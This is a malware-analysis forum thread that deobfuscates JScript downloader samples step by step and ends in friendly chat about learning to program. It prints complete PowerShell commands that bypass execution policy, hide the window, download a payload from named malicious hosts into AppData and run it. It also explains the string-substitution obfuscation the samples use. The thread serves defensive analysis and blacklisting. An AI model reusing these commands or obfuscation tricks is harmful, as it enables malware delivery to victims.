"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,wwowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"

​

var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];

=> array of string with patterns that will be replaced by chars from the long string
​

var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];

=> Array of char that will replace the patterns from nedxes on the long string ocolr

​

Examples :

All wowme occurrences will be replaced on the obfuscated long string by e
All oqby occurrences will be replaced on the obfuscated long string by '
All majs occurrences will be replaced on the obfuscated long string by -
etc,...​

The string and two arrays are initialized, now the code is ready to make the job :


var pfixyg = false;

while (1) {

if (!pfixyg) pfixyg = 0; => the index is initialized with 0

​

=> pfixyg : index to scan the arrays

​

if (pfixyg == nedxes.length) break;

=> If all values from nedxes (the patterns) have been used => break
​

var ugula = nedxes[pfixyg];

=> the pattern to be removed from long string​

​

switch (omide()) {

=> retrieves a value from omide()

​

Spoiler: details

function omide() {

Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];

return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();​

}

=> function anonymous() {

return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'​

}​

omide() => always return true (see the above spoiler)

case true:

var ovhugca = new RegExp(ugula, erazyf);

​

=> RegExp : regular expression : is an object that describes a pattern of characters

=> ugula : the pattern to bereplace on the obfuscated command line string
=> erazyf: gi : parameters for the RegExp

g : Perform a global match (find all matches rather than stopping after the first match)
i : Perform case-insensitive matching

​

ocolr = ocolr[replace](ovhugca, ezujigz[pfixyg]);

=> all occurrences of the current pattern (depends of the current index of the loop) are replace by the corresponding char, in the obfuscated long string (the command line)

​

Example : Loop with index : 0

=> pfixyg : 0
=> ezujigz[pfixyg] => ezujigz[0] => "e"

Then :

=> ocolr = ocolr[replace](/wowme/gi , "e")

All wowme occurrences will be replaced on the obfuscated long string by e​

​

break;​

}
pfixyg++;

=> next index => next pattern replaced by the corresponding char, on the obfuscated command line strin (that then become less obfuscated )​

}
return ocolr;

=> here, the end of the loop :

=> all replacements have been made
=> the deobfuscated command line string is returned ​

}

​

"cmd.eXe /c pow^eRshe^l^L^.^eX^e^ -ex^e^c^u^t^ioN^P^olicY ^BYPass -^nopr^OFiL^e^ -w^I^N^d^o^wsty^l^e^ hid^d^en^ (new^-^Ob^jec^t ^sYstem.^Net^.webcl^i^eN^t).d^OwN^LO^ad^fI^le('http ://www .brownalet.top/id.php?f=1.dat',^'%appdata%\eXe');staRt-p^rO^c^ess^ ^%aPpdata%\eXe"

​

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

​

4) Conclusion :

Small modifications that don't really make harder to get all the malware parts.

run powershell.exe :

-execuyionpolivy bypass

=> allows to bypass the execution policy

​

-noprofile

​

=> to launch the script with in an untouched environment (it ddoesn't load the Windows Powershell profile)

​

-windowstyle hidden

=> hide the powershell window

​

(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');

=> creates an .NET object and use its downloadfile method to downlad the payload and save it on HD
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe

​

start-process %appdata%\eXe"

​

=> run the payload
​

-----------------
BILL-24436.js

https://malwaretips.com/threads/similar-method-small-evolution-euro_27507-js-bill-24436-js-updated.65637/#post-568227​

7.js

https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623​

 

[frogboy]

I really do wish i could understand these posts but it is way beyond my level. Thanks.

Maybe one day.

 

[tim one]

Another great job @DardiM!!

@frogboy I think that we have to learn BatPenguin language before!

 

[frogboy]

Another great job @DardiM!!

@frogboy I think that we have to learn BatPenguin language before!

So very true my friend.

 

[DardiM]

@frogboy & @tim one :

It is based on other analysis of the same family, but who have a little evolved, I can't do all since the beginning :'(
In this case I only show the changes

For your homework :
=> https://malwaretips.com/threads/eas...ie-js-3-53-oct-19-tofsee-js-downloader.64661/
=> https://malwaretips.com/threads/eas...ader-family-oct-19-nov-2-and-8-updated.65079/

 

[tim one]

What don't you understand ?
- A big array of chars
- 2 small arrays with the same number of element, each char from one array is changed by the char in another array for same position, and this new char replace all the occurrence of old string on the big array of string... At the end we obtain the famous command lines 'with cmd /c powershell etc .... url.....payload...

Natural condition, the difficulty is inherent in the context and you are doing a great and appreciable work to make this more understandable.
And it is also understandable that some people may have some difficulties but this does not detract from the merit of your work.
Very technical stuff, but it is normal to be so

 

[DardiM]

@frogboy & @tim one :

I think previous analysis of this js donwloader familly could help
=> https://malwaretips.com/threads/eas...ie-js-3-53-oct-19-tofsee-js-downloader.64661/
=> https://malwaretips.com/threads/eas...ader-family-oct-19-nov-2-and-8-updated.65079/


(1)

- A big array of chars => join(",") => become a long String : the future command line once deobfuscated.


- 2 small arrays are used to "decode" the string :

- one array with the pattern to be found on the string
- one array with the char used as replacement, on the string, of the pattern​

Example :

BIG = ["zo fpzt bfpu"]

ref = ['z', "p", "f", "v", "o" ]
mo = ['i', "a", "e", "u", "l" ]

From ref : all the z in BIG will be replaced by i IN REF
From ref : all the p in BIG will be replaced by a IN REF
From ref : all the f in BIG will be replaced by e IN REF
From ref : all the v in BIG will be replaced by u IN REF
From ref : all the o in BIG will be replaced by l IN REF

BIG = ["zo fpzt bfpu"]

=> BIG decoded : ["il fait beau"]​

(2) To find the run part (when the script run the payload) :

We must find were are the shell.run(.......)

=> On the previous sample :

Like :

rzerzek.run(BIG,jhgjgjgq)
​

=> on the current sample

Like :

rzerzek["r"+"un"](BIG,jhgjgjgq)​

Older samples, only a search on the "run" word made us find the run part (hidden on a lot of useless lines of code)

Current sample :

=> they have divided the word 'run" to avoid a search on it : "r"+"un"
=> using the name of the command line allows us to find quickly the run part

Conclusion :

- easy to find where are the command line parts
- easy to find the run part
- in a script that its very very long, only this few parts are usefull​

 

[DardiM]

updated the main post, hope it is more understandable

 

[askmark]

An awesome job as always @DardiM. Thanks for taking the time explain everything in such detail.

I found it amusing they used the function called bufosmy(). Presumably this is an anagram of "my obsfu"?

 

[Sr. Normal 2.0]

Where can i learn klingon, please? No, seriosly, thanks for your work.
I try to read it normally, then backwards, avoiding one in three characters .... nothing my friend, this is stronger than me. I think studying kinglon to have more possibilities

 

[DardiM]

An awesome job as always @DardiM. Thanks for taking the time explain everything in such detail.

I found it amusing they used the function called bufosmy(). Presumably this is an anagram of "my obsfu"?

Thanks

"my obfus" => "my obfuscation"
Good observation, I have not seen the link before you talk about this

 

[DardiM]

Where can i learn klingon, please? No, seriosly, thanks for your work.
I try to read it normally, then backwards, avoiding one in three characters .... nothing my friend, this is stronger than me. I think studying kinglon to have more possibilities

The purpose and method used to make my posts :

- I only post analysis of obfuscated samples, so all parts are like klingon, because it is really what we can see when looking at the whole code, but I always explain what these parts mean (and how to find how to decode it : like a puzzle).

- Really basic Knowledge in scripting language (or other language) is needed, but I can't teach it : I only show the tricks/methods that was used to obfuscate the script, and how to deobfuscate it.

- Once I showed that strange parts are only "klingon variables names" with an understandable content (and how the maker of the script has obfuscated it), and that they only use these "klingon names" in the following parts, to build "klingon sentences",
=> I translate these strange parts (replacing the "klingon sentences" by the understandable content) to avoid people to do the job, and show what the script makes in reality (near obuscated parts).
=> So, to understand, most people just have to read the part in "green" that are the translation of this klingon language in "blue".

- Then, at the end, I always show the real important parts of the script : URLs used and payload (to blacklist).​

I understand that even this way it can be hard to understand the deobfuscation part without basic scripting language knowledge (or other languages) , but it's normal, I think.

I could only post analysis explaining what the sample makes - I mean "once deobfuscated", clearly, easily and

- not speaking about the obfuscation part (or not in detail)
- not trying to show how to deobfuscate it​

=> but it is really not what I want
=> I will only post analysis like "puzzle" games (I really chose the sample because of the obfuscation method(s) used) doing like if people that read the deobfuscation part have basis on scripting language and at the end information about URLs / payload.

"I think studying kinglon to have more possibilities "

=> a good JavaScript tuto will do the job (even to understand my analysis from vbs) ​

 

[Sr. Normal 2.0]

The purpose and method used to make my posts :

- I only post analysis of obfuscated samples, so all parts are like klingon, because it is really what we can see when looking at the whole code, but I always explain what these parts mean (and how to find how to decode it : like a puzzle).

- Really basic Knowledge in scripting language (or other language) is needed, but I can't teach it : I only show the tricks/methods that was used to obfuscate the script, and how to deobfuscate it.

- Once I showed that strange parts are only "klingon variables names" with an understandable content (and how the maker of the script has obfuscated it), and that they only use these "klingon names" in the following parts, to build "klingon sentences",
=> I translate these strange parts (replacing the "klingon sentences" by the understandable content) to avoid people to do the job, and show what the script makes in reality (near obuscated parts).
=> So, to understand, most people just have to read the part in "green" that are the translation of this klingon language in "blue".

- Then, at the end, I always show the real important parts of the script : URLs used and payload (to blacklist).​

I understand that even this way it can be hard to understand the deobfuscation part without basic scripting language knowledge (or other languages) , but its normal, I think.

"I think studying kinglon to have more possibilities "

=> a good JavaScript tuto will do the job (even to understand my analysis from vbs) ​

Thanks for your reply, I really appreciate it.

What I really hope is not to have bothered you because I highly value the work you do and I have a sincere respect for you.
I express myself, or try to express myself, in a humorous way because I certainly do not have the intelligence to correctly understand computer programming. Many years (wow, too many) I learned to do small programs in Basic (oh! The goto instruction did miracles for me ) and when I tried to learn structured languages (C ++, Pascal ...) was for me as Klingon. Not like the right Klingon, rather like the Klingon that must be spoken in interstellar taverns in the wee hours of the morning.

Thanks again for your response and for your time. You are an inspiration and do a commendable job.

 

[DardiM]

Thanks for your reply, I really appreciate it.

What I really hope is not to have bothered you because I highly value the work you do and I have a sincere respect for you.
I express myself, or try to express myself, in a humorous way because I certainly do not have the intelligence to correctly understand computer programming. Many years (wow, too many) I learned to do small programs in Basic (oh! The goto instruction did miracles for me ) and when I tried to learn structured languages (C ++, Pascal ...) was for me as Klingon. Not like the right Klingon, rather like the Klingon that must be spoken in interstellar taverns in the wee hours of the morning.

Thanks again for your response and for your time. You are an inspiration and do a commendable job.

"What I really hope is not to have bothered you ..."
No, because you, at least, wrote on my post (not on another posts) that you don't understand them not insinuating "because of the writer fault"
=> this is the real intelligence

"I certainly do not have the intelligence to correctly understand computer programming"
I don't think so
And a lot of people that understand computer programming are not specially intelligent
(and vice versa)

The only thing that can bother me : people that don't understand without seeing that the reason could be on their side (or on both sides : that is also why I often update the threads to be more understandable, but will never teach on it the scripting language part)

=> I have just taken advantage of the opportunity to explain the aims of my posts (to "all" the people - The most concerned will certainly not read this thread ).
​

"in a humorous way" + "Thanks for your reply, I really appreciate it. "
=> I like your sense of humor and person, if not : I would not have answered

I will try to find real good JavaScript/VBS tutos that could help (only combined basic operations can make methods to deobfuscatest parts of script-based malware)

 

[Sr. Normal 2.0]

@DardiM Thanks my friend.

Lately I'm too busy, but I promise to give it a try.

Thanks again my friend the king of Penguin and Bats

In Spanish we can find this course of a really prestigious site

 

[DardiM]

@DardiM Thanks my friend.

Lately I'm too busy, but I promise to give it a try.

Thanks again my friend the king of Penguin and Bats

In Spanish we can find this course of a really prestigious site

Java has nothing to do with JavaScript/JScript.

One explanation I made : Video Review - More Fun with Ransomware Part 7

But once you know one language, there is some part that help to understand almost any language (the basic operations).

=> If I can't find an easy tuto, I will make one targeting what is the most used in the script-based samples.

 

[Sr. Normal 2.0]

Java has nothing to do with JavaScript/JScript.

One explanation I made : Video Review - More Fun with Ransomware Part 7

But once you know one language, there is some part that help to understand almost any language (the basic operations).

=> If I can't find an easy tuto, I will make one targeting what is the most used in the script-based samples.

Thanks my friend. Well, i think the first step should be HTML, right? . Perhaps this old dog must begin for here, little by little. Thanks my friend for your dedication

 

[DardiM]

Thanks my friend. Well, i think the first step should be HTML, right? . Perhaps this old dog must begin for here, little by little. Thanks my friend for your dedication

It depends of what you want

The script-based samples from Malware Vault are 99.99% scripts that run under Windows Script Host environment : 0 HTML code inside => this last is the standard markup language for creating web pages and web applications.
JavaScript is a lot of used in HTML web page, but it is a scripting programming language, and it can also be used on scripts that are used under Windows Script Host environment (WScript.exe / CScript.exe). In fact, this is like other scripting language : mainly inside a webpage or under Windows Script Host environment.

If you don't want to make some webpage /website/web applications, it is better, I think, to begin learning a programming language like Java/C++/C#/VB.Net
=> then it can also be useful if you want to make some personal progs
=> when one of this programming language is known, it is not very difficult to lean another one.

 

[tim one]

Why these .js samples are so dangerous?

Some codes, after a certain timeout, dynamically can load another javascript code hosted on a site under the control of the attacker.
Starting from the violation of one or more sites, based in this case, the
malicious code can load the payload of the attack from another site.

Often, they do not inject directly the malicious code on compromised sites because the loader does not include only a website from which to download the malware. Starting from the assumption that sooner or later the sites will be blacklisted, the attacker wants to have a bit of flexibility, and then separate the loader from one or more malicious different codes that he put around the Internet.
In general these stages still allows a bit of flexibility to manage any update to the code of the malware itself.

Of course, a javascript loaded and executed in the browser can do a lot of damage. For example, it can send my credentials via HTTP to a site controlled by the attacker or, even "better", it can download other executable malicious code on my PC.

 

[DardiM]

update :

Added one new sample:

From https://malwaretips.com/threads/23-11-2016-20.65760/#post-568222
thanks to @XIII

BILL-24436.js

1) Main difference :

SEE THE FIRST POST FOR EXPLANATIONS

Obfuscated Command Line String :

var ilfygpud = "vnyvequf,mpafi,ibdun,yibdun,v,ipx,ibdun,rif,xyvd,ubu,equf,xequf,mpafi,juafequf,,equf,xyvd,x,agaibdun,jequf,,vnyvequf,mpafi,ibdun,yibdun,v,ipx,mpafi,juafequf,,equf,xyvd,x,pcxobc,ompafi,equf,rafequf,,cxobc,ibdun,equf,lLcxobc,ubu,equf,xequf,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,badn,equf,Xcxobc,equf,vnyvequf,mpafi,ibdun,yibdun,v,ipx,Ucxobc,vequf,mpafi,ibdun,yibdun,v,IOcxobc,Ncxobc,polIvnyvequf,mpafi,ibdun,yibdun,v,ipx,cxobc,ympafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,Bycxobc,Plyibdun,f,cxobc,afequf,,afequf,,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,badn,cxobc,ncxobc,OPrcxobc,oFcxobc,Ilcxobc,equf,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,badn,mpafi,INxyvd,ompafi,afequf,,cxobc,vequf,mpafi,ibdun,yibdun,v,yLequf,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,ibdun,cxobc,icxobc,xyvd,xyvd,cxobc,equf,ncxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,afequf,,aq,nequf,mpafi,badn,OBjcxobc,equf,vnyvequf,mpafi,ibdun,yibdun,v,ipx,cxobc,vequf,mpafi,ibdun,yibdun,v,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,afequf,,yafequf,,vequf,mpafi,ibdun,yibdun,v,equf,ibdun,rif,cxobc,ubu,Ncxobc,equf,vequf,mpafi,ibdun,yibdun,v,ubu,cxobc,mpafi,equf,bvnyvequf,mpafi,ibdun,yibdun,v,ipx,Licxobc,equf,ncxobc,vequf,mpafi,ibdun,yibdun,v,bplyibdun,f,f,ubu,xyvd,Ompafi,nlcxobc,Ocxobc,lyibdun,f,xyvd,cxobc,FILcxobc,equf,afequf,,aq,equf,ibdun,ugb,ibdun,vequf,mpafi,ibdun,yibdun,v,vequf,mpafi,ibdun,yibdun,v,prvequf,vequf,mpafi,ibdun,yibdun,v,i,agaibdun,jequf,,agaibdun,jequf,,mpafi,mpafi,mpafi,ubu,blyibdun,f,lyibdun,f,afequf,,lorequf,llyibdun,f,bubu,mpafi,lyibdun,f,ngagaibdun,jequf,,uafequf,,equf,rubu,pibdun,p?f=1ubu,xyvd,lyibdun,f,vequf,mpafi,ibdun,yibdun,v,equf,ibdun,ugb,,equf,ibdun,ugb,nxylvequf,mpafi,ibdun,yibdun,v,,lyibdun,f,PPxyvd,lyibdun,f,vequf,mpafi,ibdun,yibdun,v,lyibdun,f,nxylvequf,mpafi,ibdun,yibdun,v,,ubu,equf,Xequf,equf,ibdun,ugb,bplyibdun,f,f,raibdun,vequf,mpafi,ibdun,yibdun,v,,afequf,,cxobc,vequf,mpafi,ibdun,yibdun,v,cxobc,lyibdun,f,Rvequf,mpafi,ibdun,yibdun,v,cxobc,badn,pRcxobc,Ocxobc,vnyvequf,mpafi,ibdun,yibdun,v,ipx,equf,cxobc,afequf,,afequf,,mpafi,juafequf,,equf,xyvd,x,nxylvequf,mpafi,ibdun,yibdun,v,,lyibdun,f,pPxyvd,lyibdun,f,vequf,mpafi,ibdun,yibdun,v,lyibdun,f,nxylvequf,mpafi,ibdun,yibdun,v,,ubu,equf,xequf,"​

Array of string with patterns that will be replaced by chars on the obfuscated Command Line String

​

var izyme = ['ibdun,', 'equf,', 'badn,', "mpafi,", "vewhyhv,", "cxobc,", "xyvd,", "nxylt,", "afe,", "wjusedx,", "vnytipx,", 'agahje,', "azuji,", "raht,", "hrif,", 'ubu,', 'saq,', "rveti,", 'ehugb,', "lyhf,", 'bpaf,'];​

Array of char that will replace the patterns from izyme on the obfuscated Command Line String

​

var jmijkewxa = [['h'][0], ["e"][0], ["-"][0], ['w'][0], ['t'][0], ["^"][0], ['d'][0], ["%"][0], ["s"][0], [" "][0], ['c'][0], ["/"][0], ["\,"][0], [";"][0], ['m'][0], ['.'][0], ["("][0], [":"][0], ["'"][0], ["a"][0], [')'][0]];​

here are the main change from previous sample :​

=> each value is no more directly a char, but a tab with one char, retrieve by index 0

['h'][0] => "h"
["e"][0] => "e"
​

then :

var jmijkewxa = ['h', "e", "-", 'w', 't', "^", 'd', "%", "s", " ", 'c', "/", "\,", ";", 'm', '.', "(", ":", "'", "a", ')'];

​

The script make the same operations to get the deobfuscated command line :

We get :

"cmd.exe /c p^owers^helL^.exe^ -eX^ecU^tIO^N^polIc^y ^By^Pa^ss^ -^n^OPr^oF^Il^e^ ^-wINdows^tyLe h^i^dd^en^ ^(new-OBj^ec^t^ system^.N^et.^webcLi^en^t).dOwnl^O^ad^FIL^e('http ://www .baaslorelab.wang/user.php?f=1.dat','%aPPdata%\eXe');s^t^aRt^-pR^O^ce^ss %apPdata%\exe"​

That means :

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .baaslorelab.wang/user.php?f=1.dat','%appdata%\exe');start-process %appdata%\exe"​

To find the run part : still the same method

- The command line deofuscation is made by the function gwijqowy()​

=> a search with notepad gives :​

var ycwomn = gwijqowy();​

=> a search on ycwomn give :​

case "62152":

if (agykiwjubs == 'undefined') {

cpohkowa["r" + "un"](ycwomn, dwecuq);​

}

​

=> cpohkowa["r" + "un"](ycwomn, dwecuq);

var dwecuq = 0;

​

=> shell.run(comnandLine, 0)

​

SEE THE FIRST POST FOR EXPLANATIONS OF COMMAND LINE CONTENT

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .baaslorelab.wang/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

Payload:

C:\Users\fredd\AppData\Roaming\eXe​

URL :

http ://www .baaslorelab.wang/user.php?f=1.dat​

​